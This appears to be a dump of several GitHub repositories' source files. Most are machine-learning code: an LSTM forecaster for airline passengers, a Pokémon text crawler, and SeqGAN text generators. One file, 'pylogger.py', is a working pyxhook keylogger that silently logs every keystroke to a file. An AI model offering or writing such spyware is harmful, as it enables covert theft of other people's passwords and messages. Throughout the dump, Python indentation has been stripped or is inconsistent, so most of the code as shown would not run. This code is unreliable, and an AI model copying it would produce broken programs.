parameters, data, default_case
)
continue
if temp_type.startswith("ref:"):
if temp_type[4:] not in _templates["definitions"]:
raise AttributeError("reference not found: %s" % temp_type[4:])
reference = _templates["definitions"][temp_type[4:]]
(parameters, data) = cls._unpack_parameters(parameters, data, reference)
continue
if "length" in template:
param_bytes = data[: template["length"]]
data = data[template["length"] :]
else:
param_bytes = data
data = None
if "value" in template:
continue
temp_name = template["name"]
temp_endian = template["byteorder"] if "byteorder" in template else "big"
# invert data if little endian
if temp_endian == "little":
param_bytes = param_bytes[::-1]
if temp_type == "bool":
if (
"true-value" in template
and param_bytes.hex() == template["true-value"]
):
param_bytes = b"\x01"
elif (
"false-value" in template
and param_bytes.hex() == template["false-value"]
):
param_bytes = b"\x00"
parameters[temp_name] = bool(int.from_bytes(param_bytes, "big"))
elif temp_type == "int":
temp_signed = template["signed"] if "signed" in template else False
parameters[temp_name] = int.from_bytes(
param_bytes, "big", signed=temp_signed
)
elif temp_type == "str":
parameters[temp_name] = param_bytes.decode("ascii")
elif temp_type == "hex":
parameters[temp_name] = param_bytes.hex()
elif temp_type == "object":
(parameters[temp_name], data) = cls._unpack_parameters(
{}, param_bytes, template["properties"]
)
elif temp_type == "array":
parameters[temp_name] = []
while param_bytes:
(params, param_bytes) = cls._unpack_parameters(
{}, param_bytes, [template["items"]]
)
parameters[temp_name].extend(params.values())
elif temp_type.startswith("enum:"):
enum_type = getattr(sr920.enums, temp_type[5:])
parameters[temp_name] = enum_type(int.from_bytes(param_bytes, "big"))
else: # bytes
parameters[temp_name] = param_bytes
return parameters, data
def __str__(self):
# _logger.debug("enter __str__()")
return "SR920Command: command_id=%s, parameters=%s" % (
self.command_id,
self.parameters,
)
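
# Usage sketch (the command id below is hypothetical -- see SR920CommandId
# for the real values):
#   cmd = SR920Command(sr920.SR920CommandId.GET_VERSION)
#   frame = cmd.to_bytes()            # serialize into on-wire bytes
#   echo = SR920Command.parse(frame)  # parse the bytes back into a command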
``` |
{
"source": "55708r/ANCM-Mini-Project",
"score": 3
} |
#### File: 55708r/ANCM-Mini-Project/predict airflight passengers1 - Copy (2).py
```python
import math
import matplotlib.pyplot as plt
import numpy as np
from keras.layers import LSTM, Dense, Dropout
from keras.models import Sequential
from pandas import read_csv
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import MinMaxScaler
# convert an array of values into a dataset matrix
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
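
# For example, with look_back=1 the series [112, 118, 132, 129] becomes
#   X = [[112], [118]] and Y = [118, 132],
# i.e. each sample predicts the next value from the previous one.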
# fix random seed for reproducibility
np.random.seed(7)
# load the dataset
dataframe = read_csv('airline-passengers.csv', usecols=[1], engine='python')
dataset = dataframe.values
dataset = dataset.astype('float32')
# normalize the dataset
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
# split into train and test sets
train_size = int(len(dataset) * 0.67)
test_size = len(dataset) - train_size
train, test = dataset[0:train_size,:], dataset[train_size:len(dataset),:]
# reshape into X=t and Y=t+1
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
# reshape input to be [samples, time steps, features]
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
drop = 0.0 #set dropout value
rmses = []
rmsesT = []
varrmses = []
varrmsesT = []
for j in range(10):
    rmse = []
    rmseT = []
print(drop)
for i in range(10):
print(i)
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
# reshape input to be [samples, time steps, features]
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
#create and fit the LSTM network
model = Sequential()
model.add(LSTM(4, input_shape=(1, look_back), return_sequences=True))
model.add(Dropout(drop))
model.add(LSTM(4, input_shape=(1, look_back)))
model.add(Dropout(drop))
model.add(Dense(1))
## Adding the output layer
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=100, batch_size=1, verbose=2)
# make predictions
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
# invert predictions
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
# calculate root mean squared error
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
        rmse.append(trainScore)
        rmseT.append(testScore)
varrmses.append(rmse) #add rmse scores (10) for a given dropout value
varrmsesT.append(rmseT) #add rmse scores for a given dropout value
meanrmse = np.mean(rmse)
meanrmseT =np.mean(rmseT)
rmses.append(meanrmse)
rmsesT.append(meanrmseT)
    drop = drop + 0.1
print(varrmses)
print(varrmsesT)
print(rmses)
print(rmsesT)
#shift train predictions for plotting
#trainPredictPlot = np.empty_like(dataset)
#trainPredictPlot[:, :] = np.nan
#trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
#shift test predictions for plotting
#testPredictPlot = np.empty_like(dataset)
#testPredictPlot[:, :] = np.nan
#testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
# plot baseline and predictions
#plt.plot(scaler.inverse_transform(dataset))
#plt.plot(trainPredictPlot)
#plt.plot(testPredictPlot)
#plt.xlabel('Number of airflight passengers in this month (t) in thousands', fontsize = 11)
#plt.ylabel('Number of airflight passengers in next month (t+1) in thousands', fontsize = 11)
#plt.title('Prediction of airflight passenger numbers by a single-layer LSTM', fontsize=14)
#plt.show()
#plt.savefig('Airflight predictions for dropout value 0.7.png')
np.save('Train RMSE scores per dropout value', varrmses)
np.save('Test RMSE scores per dropout value', varrmsesT)
np.save('Train RMSE scores per dropout value averaged over 10 runs', rmses)
np.save('Test RMSE scores per dropout value averaged over 10 runs', rmsesT)
``` |
{
"source": "557mp/pk_story",
"score": 3
} |
#### File: pk_story/0_web_crawler/load_crawling_data.py
```python
import glob
import pandas as pd
import numpy as np
import re
from konlpy.tag import Kkma
from konlpy.utils import pprint
import pickle
import os
import csv
path = './data/'
filenames = glob.glob(path + "/*.csv")
frame = pd.DataFrame()
list_ = []
for file_ in filenames:
df = pd.read_csv(file_, index_col=None)
list_.append(df)
frame = pd.concat(list_)
def _save_pickle(path, data):
# save pkl
f = open(path, 'wb')
pickle.dump(data, f)
f.close()
# swap type1 and type2 to build new_type
# handle the Flying ('비행') and Normal ('노말') types
def Type(type1, type2):
if type1 == '노말' and type2 == type2:
return type2
elif type2 == '비행':
return '비행'
else:
return type1
# handle just the Flying ('비행') type
def Type2(type1, type2):
if type2 == '비행':
return '비행'
else:
return type1
frame['new_type'] = frame[['type1','type2']].apply(lambda x: Type(x['type1'], x['type2']), axis=1)
# frame.head(10)
poke_type_list = list(frame['new_type'].value_counts().index)
# per type: total pokemon, pokemon used, sentence count, excluded pokemon count
info_data = pd.DataFrame(columns=('type', 'poke_cnt', 'useful_poke', 'sentence_cnt', 'extract_poke'))
special_data = []  # stores (poke_name, sentence) pairs that were excluded
type_dict = dict()
for poke_type in poke_type_list:
new_data = []
poke_name = []
etc_poke = []
print("....devide by {} type poketmon ...".format(poke_type))
print("poketmon counts....{}".format(len(frame[frame['new_type']==poke_type])))
# get desc by type
print(".... get desc by {} type....".format(poke_type))
for desc in frame.loc[frame['new_type']== poke_type, ['name', 'desc']].values.tolist():
if '(' in desc[1]:
special_data += desc
etc_poke.append(desc[0])
else:
poke_name.append(desc[0])
new_data += re.sub(r"[^ㄱ-힣a-zA-Z0-9.]+", ' ', desc[1]).strip().split('.')
# make uniq sentence
print("....extract uniq sentence....")
new_data = list(set(new_data))
new_data.remove('')
print("Number of sentence .... {}".format(len(new_data)))
# to word to pos
print("....convert to pos....")
kkma = Kkma()
pos_sentence = []
for sentence in new_data:
pos_sentence += [kkma.pos(sentence)]
print("....add dict....")
# add to dict
type_dict[poke_type] = pos_sentence
# make info data
info_data = info_data.append([{'type': poke_type,
'poke_cnt': len(frame[frame['new_type']==poke_type]),
'useful_poke': len(poke_name),
'sentence_cnt': len(new_data),
'extract_poke': len(etc_poke)}], ignore_index=True)
# break
DATA_PATH = "./data/"
if not os.path.isdir(DATA_PATH):
os.mkdir(DATA_PATH)
_save_pickle(DATA_PATH + 'type_dict.pickle', type_dict)
info_data.to_csv(DATA_PATH + "pk_info_data.csv", index=False, quotechar='"', encoding='utf-8-sig', quoting=csv.QUOTE_NONNUMERIC)
# a = open('type_dict.pickle', 'rb')
# type_dict_load = pickle.load(a)
```
#### File: pk_story/2_seqgan/create_word2vec.py
```python
import pandas as pd
import re
import collections
#from konlpy.tag import Twitter, Kkma
import pickle
import collections
import random
import numpy as np
import os
from gensim.models.word2vec import Word2Vec
def _save_pickle(path, data):
# save pkl
f = open(path, 'wb')
pickle.dump(data, f)
f.close()
# load the data
print("Load real data ...")
a = open('./data/pk_real_data.pkl', 'rb')
sentences = pickle.load(a)
# pk_idx2pos.pkl
a = open('./data/pk_idx2pos.pkl', 'rb')
idx2pos = pickle.load(a)
# pk_pos2idx.pkl
a = open('./data/pk_pos2idx.pkl', 'rb')
pos2idx = pickle.load(a)
sentence_idx = []
for sentence in sentences:
words = []
for word in sentence:
words.append(pos2idx[word[0]])
sentence_idx.append(words)
sentences_words = []
for sen in sentence_idx:
sentence = []
for pos_idx in sen:
sentence.append(idx2pos[pos_idx])
sentences_words.append(sentence)
# train word2vec
print("Training word2vec ...")
model = Word2Vec(sentences_words, size=30, window=5,min_count=0, workers=4, iter=10, sg=1)
# test word2vec
print("Test word2vec ...")
print(model.most_similar("불"))  # "불" means "fire"
# add random vectors for <start>, UNK, etc., then save the matrix as numpy
key = list(pos2idx.keys())
w2v = []
for k in key:
if k == '<start>' or k == 'UNK' or k == '후다':
print(k)
w2v.append(np.random.randn(30)*0.1)
else:
w2v.append(model.wv[k])
w2v=np.array(w2v)
_save_pickle('./data/pk_embedding_vec.pkl', w2v)
print("Save word2vec !")
# pk_embedding_vec.pkl
a = open('./data/pk_embedding_vec.pkl', 'rb')
w2v_load = pickle.load(a)
print(np.shape(w2v_load))
print(w2v_load)
```
#### File: pk_story/2_seqgan/sequence_gan_load_test.py
```python
import numpy as np
import tensorflow as tf
import random
from dataloader import Gen_Data_loader, Dis_dataloader
from generator import Generator
from discriminator import Discriminator
from rollout import ROLLOUT
import pickle
#########################################################################################
# Generator Hyper-parameters
######################################################################################
EMB_DIM = 30 # embedding dimension (pretrained: 200, pk: 30)
HIDDEN_DIM = 300 # hidden state dimension of lstm cell
SEQ_LENGTH = 30 # sequence length
START_TOKEN = 0
PRE_EPOCH_NUM = 120 # supervise (maximum likelihood estimation) epochs
SEED = 88
BATCH_SIZE = 64
#########################################################################################
# Discriminator Hyper-parameters
#########################################################################################
dis_embedding_dim = EMB_DIM
dis_filter_sizes = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 30]
dis_num_filters = [100, 200, 200, 200, 200, 100, 100, 100, 100, 100, 160, 160]
dis_dropout_keep_prob = 0.75
dis_l2_reg_lambda = 0.2
dis_batch_size = 64
#########################################################################################
# Basic Training Parameters
#########################################################################################
TOTAL_BATCH = 200
generated_num = 1000
sample_num = 10
# original seqgan parameter
# HIDDEN_DIM = 32
# PRE_EPOCH_NUM = 120
# TOTAL_BATCH = 200
# generated_num = 10000
positive_file = './data/3_pk_data_index.txt'
negative_file = 'save/negative_sample.txt'
eval_file = 'save/eval_file.txt'
# "pretrain" or "poke"
embed_flag = "poke"
a = open('./data/3_pk_data_index.pkl', 'rb')
real_data = pickle.load(a)
a = open('./data/pk_pos2idx.pkl', 'rb')
vocab_to_int = pickle.load(a)
a = open('./data/pk_idx2pos.pkl', 'rb')
int_to_vocab = pickle.load(a)
if embed_flag == "pretrain":
a = open('./data/pretrain_embedding_vec.pkl', 'rb')
elif embed_flag == "poke":
a = open('./data/pk_embedding_vec.pkl', 'rb')
word_embedding_matrix = pickle.load(a)
word_embedding_matrix = word_embedding_matrix.astype(np.float32)
# a = open('./data/word_dict.pickle', 'rb')
# word_dict = pickle.load(a)
real_data_vocab = [[int_to_vocab[i] for i in sample if int_to_vocab[i] != '<PAD>'] for sample in real_data]
real_data_vocab = [' '.join(sample) for sample in real_data_vocab]
print(len(real_data_vocab))
def generate_samples(sess, trainable_model, batch_size, generated_num, output_file, word_embedding_matrix):
# Generate Samples
generated_samples = []
for _ in range(int(generated_num / batch_size)):
generated_samples.extend(trainable_model.generate(sess, word_embedding_matrix))
with open(output_file, 'w') as fout:
for poem in generated_samples:
buffer = ' '.join([str(x) for x in poem]) + '\n'
fout.write(buffer)
def pre_train_epoch(sess, trainable_model, data_loader, word_embedding_matrix):
# Pre-train the generator using MLE for one epoch
supervised_g_losses = []
data_loader.reset_pointer()
for it in range(data_loader.num_batch):
batch = data_loader.next_batch()
_, g_loss = trainable_model.pretrain_step(sess, batch, word_embedding_matrix)
supervised_g_losses.append(g_loss)
return np.mean(supervised_g_losses)
def make_sample(eval_file, int_to_vocab, sample_num):
samples = []
with open(eval_file, 'r') as f:
for line in f:
line = line.strip()
line = line.split()
parse_line = [int(x) for x in line]
samples.append(parse_line)
sample_int = samples[:sample_num]
sample_vocab = [[int_to_vocab[i] for i in sample] for sample in sample_int]
sample_vocab = [' '.join(sample) for sample in sample_vocab]
return sample_vocab
################################## main() #########################################
# load model path (./chekckpoint)
load_model_path = './checkpoint/test5_pkembed/seqGAN_ours'
tf.reset_default_graph()
random.seed(SEED)
np.random.seed(SEED)
gen_data_loader = Gen_Data_loader(BATCH_SIZE, SEQ_LENGTH)
vocab_size = len(vocab_to_int) # 6447
print(vocab_size)
dis_data_loader = Dis_dataloader(BATCH_SIZE, SEQ_LENGTH)
generator = Generator(vocab_size, BATCH_SIZE, EMB_DIM, HIDDEN_DIM, SEQ_LENGTH, START_TOKEN)
discriminator = Discriminator(sequence_length=SEQ_LENGTH, num_classes=2, word_embedding_matrix=word_embedding_matrix,
embedding_size=dis_embedding_dim, filter_sizes=dis_filter_sizes,
num_filters=dis_num_filters, l2_reg_lambda=dis_l2_reg_lambda)
rollout = ROLLOUT(generator, 0.8, word_embedding_matrix)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
saver = tf.train.Saver()
sess.run(tf.global_variables_initializer())
print('#########################################################################')
print('Restore Trained Seqgan parameters...')
saver.restore(sess, load_model_path)
print("Model restored.")
# Generate samples using Trained Model
generate_samples(sess, generator, BATCH_SIZE, generated_num, eval_file, word_embedding_matrix)
samples = make_sample(eval_file, int_to_vocab, generated_num)
samples = [[word for word in sample.split() if word != 'UNK'] for sample in samples]
samples = [' '.join(sample) for sample in samples]
f = open('./save/eval_seqgan_vocab.txt', 'w')
for token in samples:
token = token + '\n'
f.write(token)
f.close()
```
#### File: pk_story/3_conditional_seqgan/generator.py
```python
import tensorflow as tf
from tensorflow.python.ops import tensor_array_ops, control_flow_ops
class Generator(object):
def __init__(self, num_emb, batch_size, emb_dim, hidden_dim,
sequence_length, start_token, type_size,
learning_rate=0.01, reward_gamma=0.95):
self.num_emb = num_emb
self.batch_size = batch_size
self.emb_dim = emb_dim
self.hidden_dim = hidden_dim
self.sequence_length = sequence_length
self.start_token = tf.constant([start_token]*self.batch_size, dtype=tf.int32)
self.word_embedding_matrix = tf.placeholder(dtype=tf.float32, shape=[num_emb, emb_dim], name='word_embed')
self.type_size = type_size
self.learning_rate = tf.Variable(float(learning_rate), trainable=False)
self.reward_gamma = reward_gamma
self.g_params = []
self.d_params = []
self.temperature = 1.0
self.grad_clip = 5.0
self.expected_reward = tf.Variable(tf.zeros([self.sequence_length]))
with tf.variable_scope('generator'):
self.g_embeddings = self.word_embedding_matrix
self.g_recurrent_unit = self.create_recurrent_unit(self.g_params) # maps h_tm1 to h_t for generator
self.g_output_unit = self.create_output_unit(self.g_params) # maps h_t to o_t (output token logits)
# placeholder definition
self.x = tf.placeholder(tf.int32, shape=[self.batch_size, self.sequence_length]) # sequence of tokens generated by generator
self.rewards = tf.placeholder(tf.float32, shape=[self.batch_size, self.sequence_length]) # get from rollout policy and discriminator
self.type_index = tf.placeholder(dtype=tf.int32, shape=[self.batch_size])
        # append the type one-hot vector to x
x_type_index = tf.reshape(tf.concat([self.type_index] * self.sequence_length, axis=0),
[self.batch_size, self.sequence_length])
self.x_type_onehot = tf.one_hot(x_type_index, self.type_size)
        # append the type one-hot vector to the start token
self.type_onehot = tf.one_hot(self.type_index, self.type_size)
# processed for batch
with tf.device("/cpu:0"):
embedding_input = tf.nn.embedding_lookup(self.g_embeddings, self.x)
embedding_input = tf.concat([embedding_input, self.x_type_onehot], axis=2)
self.processed_x = tf.transpose(embedding_input, perm=[1, 0, 2]) # seq_length x batch_size x emb_dim
# Initial states
self.h0 = tf.zeros([self.batch_size, self.hidden_dim])
self.h0 = tf.stack([self.h0, self.h0])
gen_o = tensor_array_ops.TensorArray(dtype=tf.float32, size=self.sequence_length,
dynamic_size=False, infer_shape=True)
gen_x = tensor_array_ops.TensorArray(dtype=tf.int32, size=self.sequence_length,
dynamic_size=False, infer_shape=True)
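
        # Sampling loop: at each step the embedding of the previously sampled
        # token is concatenated with the condition's type one-hot, run through
        # the LSTM cell, and the next token is drawn from the softmax output
        # via tf.multinomial.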
def _g_recurrence(i, x_t, h_tm1, gen_o, gen_x):
h_t = self.g_recurrent_unit(x_t, h_tm1) # hidden_memory_tuple
o_t = self.g_output_unit(h_t) # batch x vocab , logits not prob
log_prob = tf.log(tf.nn.softmax(o_t))
next_token = tf.cast(tf.reshape(tf.multinomial(log_prob, 1), [self.batch_size]), tf.int32)
x_tp1 = tf.concat([tf.nn.embedding_lookup(self.g_embeddings, next_token), self.type_onehot],
axis=1) # batch x emb_dim
gen_o = gen_o.write(i, tf.reduce_sum(tf.multiply(tf.one_hot(next_token, self.num_emb, 1.0, 0.0),
tf.nn.softmax(o_t)), 1)) # [batch_size] , prob
gen_x = gen_x.write(i, next_token) # indices, batch_size
return i + 1, x_tp1, h_t, gen_o, gen_x
_, _, _, self.gen_o, self.gen_x = control_flow_ops.while_loop(
cond=lambda i, _1, _2, _3, _4: i < self.sequence_length,
body=_g_recurrence,
loop_vars=(tf.constant(0, dtype=tf.int32),
tf.concat([tf.nn.embedding_lookup(self.g_embeddings, self.start_token), self.type_onehot],
axis=1),
self.h0, gen_o, gen_x))
self.gen_x = self.gen_x.stack() # seq_length x batch_size
self.gen_x = tf.transpose(self.gen_x, perm=[1, 0]) # batch_size x seq_length
# supervised pretraining for generator
g_predictions = tensor_array_ops.TensorArray(
dtype=tf.float32, size=self.sequence_length,
dynamic_size=False, infer_shape=True)
ta_emb_x = tensor_array_ops.TensorArray(
dtype=tf.float32, size=self.sequence_length)
ta_emb_x = ta_emb_x.unstack(self.processed_x)
def _pretrain_recurrence(i, x_t, h_tm1, g_predictions):
h_t = self.g_recurrent_unit(x_t, h_tm1)
o_t = self.g_output_unit(h_t)
g_predictions = g_predictions.write(i, tf.nn.softmax(o_t)) # batch x vocab_size
x_tp1 = ta_emb_x.read(i)
return i + 1, x_tp1, h_t, g_predictions
_, _, _, self.g_predictions = control_flow_ops.while_loop(
cond=lambda i, _1, _2, _3: i < self.sequence_length,
body=_pretrain_recurrence,
loop_vars=(tf.constant(0, dtype=tf.int32),
tf.concat([tf.nn.embedding_lookup(self.g_embeddings, self.start_token), self.type_onehot],
axis=1),
self.h0, g_predictions))
self.g_predictions = tf.transpose(self.g_predictions.stack(), perm=[1, 0, 2]) # batch_size x seq_length x vocab_size
# pretraining loss
self.pretrain_loss = -tf.reduce_sum(
tf.one_hot(tf.to_int32(tf.reshape(self.x, [-1])), self.num_emb, 1.0, 0.0) * tf.log(
tf.clip_by_value(tf.reshape(self.g_predictions, [-1, self.num_emb]), 1e-20, 1.0)
)
) / (self.sequence_length * self.batch_size)
# training updates
pretrain_opt = self.g_optimizer(self.learning_rate)
self.pretrain_grad, _ = tf.clip_by_global_norm(tf.gradients(self.pretrain_loss, self.g_params), self.grad_clip)
self.pretrain_updates = pretrain_opt.apply_gradients(zip(self.pretrain_grad, self.g_params))
#######################################################################################################
# Unsupervised Training
#######################################################################################################
self.g_loss = -tf.reduce_sum(
tf.reduce_sum(
tf.one_hot(tf.to_int32(tf.reshape(self.x, [-1])), self.num_emb, 1.0, 0.0) * tf.log(
tf.clip_by_value(tf.reshape(self.g_predictions, [-1, self.num_emb]), 1e-20, 1.0)
), 1) * tf.reshape(self.rewards, [-1])
)
g_opt = self.g_optimizer(self.learning_rate)
self.g_grad, _ = tf.clip_by_global_norm(tf.gradients(self.g_loss, self.g_params), self.grad_clip)
self.g_updates = g_opt.apply_gradients(zip(self.g_grad, self.g_params))
def generate(self, sess, word_embedding_matrix, type_idx):
outputs = sess.run(self.gen_x, feed_dict={self.word_embedding_matrix: word_embedding_matrix,
self.type_index: type_idx})
return outputs
def pretrain_step(self, sess, x, word_embedding_matrix, type_idx):
outputs = sess.run([self.pretrain_updates, self.pretrain_loss],
feed_dict={self.x: x, self.word_embedding_matrix: word_embedding_matrix,
self.type_index: type_idx})
return outputs
def init_matrix(self, shape):
return tf.random_normal(shape, stddev=0.1)
def init_vector(self, shape):
return tf.zeros(shape)
def create_recurrent_unit(self, params):
# Weights and Bias for input and hidden tensor
self.Wi = tf.Variable(self.init_matrix([self.emb_dim + self.type_size, self.hidden_dim]))
self.Ui = tf.Variable(self.init_matrix([self.hidden_dim, self.hidden_dim]))
self.bi = tf.Variable(self.init_matrix([self.hidden_dim]))
self.Wf = tf.Variable(self.init_matrix([self.emb_dim + self.type_size, self.hidden_dim]))
self.Uf = tf.Variable(self.init_matrix([self.hidden_dim, self.hidden_dim]))
self.bf = tf.Variable(self.init_matrix([self.hidden_dim]))
self.Wog = tf.Variable(self.init_matrix([self.emb_dim + self.type_size, self.hidden_dim]))
self.Uog = tf.Variable(self.init_matrix([self.hidden_dim, self.hidden_dim]))
self.bog = tf.Variable(self.init_matrix([self.hidden_dim]))
self.Wc = tf.Variable(self.init_matrix([self.emb_dim + self.type_size, self.hidden_dim]))
self.Uc = tf.Variable(self.init_matrix([self.hidden_dim, self.hidden_dim]))
self.bc = tf.Variable(self.init_matrix([self.hidden_dim]))
params.extend([
self.Wi, self.Ui, self.bi,
self.Wf, self.Uf, self.bf,
self.Wog, self.Uog, self.bog,
self.Wc, self.Uc, self.bc])
def unit(x, hidden_memory_tm1):
previous_hidden_state, c_prev = tf.unstack(hidden_memory_tm1)
# Input Gate
i = tf.sigmoid(
tf.matmul(x, self.Wi) +
tf.matmul(previous_hidden_state, self.Ui) + self.bi
)
# Forget Gate
f = tf.sigmoid(
tf.matmul(x, self.Wf) +
tf.matmul(previous_hidden_state, self.Uf) + self.bf
)
# Output Gate
o = tf.sigmoid(
tf.matmul(x, self.Wog) +
tf.matmul(previous_hidden_state, self.Uog) + self.bog
)
# New Memory Cell
c_ = tf.nn.tanh(
tf.matmul(x, self.Wc) +
tf.matmul(previous_hidden_state, self.Uc) + self.bc
)
# Final Memory cell
c = f * c_prev + i * c_
# Current Hidden state
current_hidden_state = o * tf.nn.tanh(c)
return tf.stack([current_hidden_state, c])
return unit
def create_output_unit(self, params):
self.Wo = tf.Variable(self.init_matrix([self.hidden_dim, self.num_emb]))
self.bo = tf.Variable(self.init_matrix([self.num_emb]))
params.extend([self.Wo, self.bo])
def unit(hidden_memory_tuple):
hidden_state, c_prev = tf.unstack(hidden_memory_tuple)
# hidden_state : batch x hidden_dim
logits = tf.matmul(hidden_state, self.Wo) + self.bo
# output = tf.nn.softmax(logits)
return logits
return unit
def g_optimizer(self, *args, **kwargs):
return tf.train.AdamOptimizer(*args, **kwargs)
```
#### File: pk_story/3_conditional_seqgan/preprocess_data.py
```python
import pickle
def _save_pickle(path, data):
# save pkl
f = open(path, 'wb')
pickle.dump(data, f)
f.close()
def create_sequence(seq_length, type_dict):
type_stories = list()
for pk_type in type_dict.keys():
sentences = list()
for sent in type_dict[pk_type]:
sentences.append(sent)
type_stories.append(sentences)
data = list()
type_data = dict()
for sent in type_stories:
type_story = list()
        # loop over the sentences
        for i in range(len(sent)):
            seq_data = list()
            # keep appending words until seq_data holds seq_length tokens
while True:
flag = 0
for word in sent[i]:
if seq_length <= len(seq_data):
flag = 1
break
seq_data.append(word)
if flag == 1:
break
i += 1
if i >= len(sent):
i -= 1
while seq_length > len(seq_data):
seq_data.append(('UNK', ''))
data.append(seq_data)
type_story.append(seq_data)
type_data[len(type_data)] = type_story
_save_pickle("./data/2_pk_preprocessed_data.pkl", data)
_save_pickle("./data/2_pk_pre_type_data.pkl", type_data)
f = open('./data/2_pk_preprocessed_data.txt', 'w')
for tokens in data:
for word in tokens:
word = str(word) + ' '
f.write(word)
f.write('\n')
f.close()
def data_to_index(datadict, pos2idx):
idx_dict = dict()
for key in datadict.keys():
idx_dataset = list()
for sent in datadict[key]:
idx_sentence = list()
for word in sent:
if word[0] not in list(pos2idx.keys()):
print(word[0])
idx_sentence.append(pos2idx['UNK'])
continue
idx_sentence.append(pos2idx[word[0]])
idx_dataset.append(idx_sentence)
idx_dict[len(idx_dict)] = idx_dataset
_save_pickle("./data/3_pk_type_data_index.pkl", idx_dict)
# save pk_data_index.txt
f = open('./data/3_pk_type_data_index.txt', 'w')
for key in idx_dict.keys():
f.write("[{}]".format(str(key)))
f.write('\n')
for idx_sent in idx_dict[key]:
for word in idx_sent:
word = str(word) + ' '
f.write(word)
f.write('\n')
f.close()
if __name__ == "__main__":
DATA_PATH = "./data/"
seq_length = 30 # max 52
# load dictionary that changes type to sentences (pkl)
a = open('./data/type_dict_khkim.pickle', 'rb')
type_dict = pickle.load(a)
print(type_dict)
print("Create Sequence in a length of seq_length...")
create_sequence(seq_length, type_dict)
print("Complete Creating sequence !!")
# load after dataset
a = open("./data/2_pk_pre_type_data.pkl", 'rb')
datadict = pickle.load(a)
# load pos to index
a = open("./data/pk_pos2idx.pkl", 'rb')
pos2idx = pickle.load(a)
print("Replace Sequence to Index...")
data_to_index(datadict, pos2idx)
print("Complete Creating sequence to index !!")
``` |
{
"source": "5597/-Linux-Keylogger",
"score": 2
} |
#### File: -Linux-Keylogger/[linux] keylogger/pylogger.py
```python
import pyxhook
keyfile='/home/pylay/[linux] keylogger/file.log'
#change this to your log file's path
def OnKeyPress(event):
fob=open(keyfile,'a')
fob.write(event.Key)
fob.write('\n')
if event.Ascii==96: #96 = ascii (`)
fob.close()
new_hook.cancel()
new_hook=pyxhook.HookManager()
new_hook.KeyDown=OnKeyPress
new_hook.HookKeyboard()
new_hook.start()
``` |
{
"source": "559Labs/JobTrak",
"score": 3
} |
#### File: core/templatetags/mmg.py
```python
from django import template
import markdown
register = template.Library()
@register.filter
def markdownify(text):
# safe_mode governs how the function handles raw HTML
return markdown.markdown(text, safe_mode='escape')
@register.filter
def tag_to_list(text):
# Converts a comma-separated string to a list.
items = text.split(',')
rv = "<ul>"
for i in items:
rv += "<li>{}</li>".format(i.strip(" "))
rv += "</ul>"
return rv
```
#### File: jobtrak/links/signals.py
```python
from external_urls.signals import external_click
from django.dispatch import receiver
from django.utils import timezone
from mmg.jobtrak.links.models import *
@receiver(external_click)
def external_click_fallback(sender, url, ip, **kwargs):
link = JobBoard.objects.get(url=url)
link.last_click = timezone.now()
link.save()
```
#### File: jobtrak/util/tools.py
```python
from __future__ import print_function
import os
from django.db import models
from django.apps import apps
from pygithub3 import Github
import urllib, operator, time
from JobTrak import settings
from mmg.jobtrak import *
# mmg.jobtrak.util.tools
class Tool():
# X._meta.object_name gives the object name
# X._meta.verbose_name gives the human readable name
# X._meta.get_all_field_names() - all the fields
# X._meta.get_internal_type() - type of field
# X._meta.attname - attribute name
# X._meta.name - name can retrieve by (if the two match, it's a local field, otherwise it's a related field)
def print_models(self):
for app in apps.get_apps():
if str(app.__package__).startswith('mmg.jobtrak'):
print(" ".join(["App:", app.__package__]))
for model in apps.get_models(app):
print(" ".join(["\tModel:", model._meta.object_name]))
for field in model._meta.fields:
print(" ".join(["\t\tField:", field.name, field.attname, field.get_internal_type()]))
def generate_model_table_md(self, model):
rv = "| Field | Type |\n| :---- | :--: |\n"
for field in model._meta.fields:
rv += "| **" + field.name + "**"
if (field.name != field.attname): # Foreign Key
rv += " (FK)"
rv += " | " + field.get_internal_type() + " |\n"
return rv
def get_rev_date(self):
"""Generates the date and time footer, displaying when the document was generated for the wiki"""
return ''.join(["***\nUpdated: ", time.strftime("%Y-%m-%d %H:%M")])
def generate_model_docs(self):
WIKI_DIR = os.path.dirname(os.path.dirname(settings.BASE_DIR)) + "/JobTrak.wiki/"
for app in apps.get_apps():
if str(app.__package__).startswith('mmg.jobtrak'):
print("".join(["--> Processing ",str(app.__package__),"..."]))
a_filename =''.join([
"App:-",
app.__package__.replace('.','-').replace('mmg-jobtrak-',''),
".md"
])
a_content = "### App: " + app.__package__.replace('mmg.jobtrak.','') + "\n"
a_content += "**Package**: " + str(app.__package__) + "\n\n"
if len(apps.get_models(app)) > 0:
a_content += "| Model |\n| ----- |\n"
for model in apps.get_models(app):
m_filename=''.join([
"Model:-",
str(app.__package__).replace(".","-").replace('mmg-jobtrak-',''),
"-",
model._meta.object_name,
".md"
])
a_content += "| [[" + model._meta.object_name + "|" + m_filename + "]] |\n"
m_content = "### Model: " + app.__package__.replace('mmg.jobtrak.','') + "\n"
m_content += "**Package**: " + app.__package__ + "\n"
